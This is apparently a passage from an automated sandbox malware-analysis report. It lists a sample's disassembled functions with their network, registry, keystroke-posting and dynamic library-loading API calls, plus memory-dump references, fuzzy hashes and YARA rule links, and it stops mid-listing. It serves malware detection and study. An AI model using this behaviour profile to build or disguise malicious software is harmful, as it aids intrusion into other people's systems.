                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Copy$ClearErrorInitLast
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 3207048006-625585964
                                                                                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                              Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                              • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                              • _memmove.LIBCMT ref: 004656CA
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                              • WSACleanup.WSOCK32 ref: 00465762
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                              • String ID:
                                                                                              • API String ID: 2945290962-0
                                                                                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                              Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1457242333-0
                                                                                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                              Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 15295421-0
                                                                                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                              Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                              • String ID: X
                                                                                              • API String ID: 780548581-3081909835
                                                                                              • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                              • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                              Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                              • CloseFigure.GDI32(?), ref: 0044751F
                                                                                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                              • String ID:
                                                                                              • API String ID: 4082120231-0
                                                                                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                              Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2027346449-0
                                                                                              • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                              • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                              Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                              • GetMenu.USER32 ref: 0047A703
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                              • _wcslen.LIBCMT ref: 0047A79E
                                                                                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3257027151-0
                                                                                              • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                              • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                              Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastselect
                                                                                              • String ID:
                                                                                              • API String ID: 215497628-0
                                                                                              • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                              • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                              Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0044443B
                                                                                              • GetKeyboardState.USER32(?), ref: 00444450
                                                                                              • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                              Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 00444633
                                                                                              • GetKeyboardState.USER32(?), ref: 00444648
                                                                                              • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 87235514-0
                                                                                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                              Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2354583917-0
                                                                                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                              Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
